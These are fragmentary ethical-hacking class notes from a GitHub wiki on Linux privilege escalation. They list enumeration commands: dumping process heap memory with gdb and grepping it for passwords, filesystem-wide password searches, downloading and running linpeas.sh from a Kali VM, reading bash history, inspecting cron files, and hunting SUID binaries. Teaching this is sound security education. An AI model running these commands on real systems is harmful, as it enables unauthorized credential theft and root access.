0.00 Class 8 Linux Privilege escalation - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
- User space
- Kernel space
-
Kernel vulnerabilities
-
https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-
https://docs.microsoft.com/en-us/dotnet/standard/security/security-and-race-conditions
ps -ef
ps -ef | grep service
gdb -p <PID>
info proc mappings # mapped memory regions, note start and end memory address for [heap]
dump memory <OUTPUT_FILE> <START_ADDRESS> <STOP_ADDRESS>
strings /<OUTPUT_FILE> | grep passw
grep --color=auto -rnw '/' -ie "password" --color=always 2> /dev/null
find /etc -type f -exec grep -i -I "PASS" {} /dev/null \;
sudo python -m SimpleHTTPServer 80
wget http://<KALI-VM-IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
cat /home/user/.bash_history | grep "pass"
# mysql -u ADMIN -p SECRET
- Many ways to attack using cron
crontan
cat /etc/crontab
crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
ls -al
find / -type f -perm -u=s -ls 2>/dev/null
- SUID allows users to execute a script or binary with the permissions of the file owner
- Unprivileged users can run as root
- "x" is replaced with the SUID permission, denoted by the letter s
https://gtfobins.github.io/ GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
- strace is used to monitor and debug applications and processes and their interaction with the Linux kernel.
- Shared objects are the Linux equivalent of Dynamically Linked Libraries (DLLs) on Windows
suid-so
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
strings /usr/local/bin/suid-so
- not persistent by default.
- will be gone next time you boot
- you need additional trick to make grub edits persistent.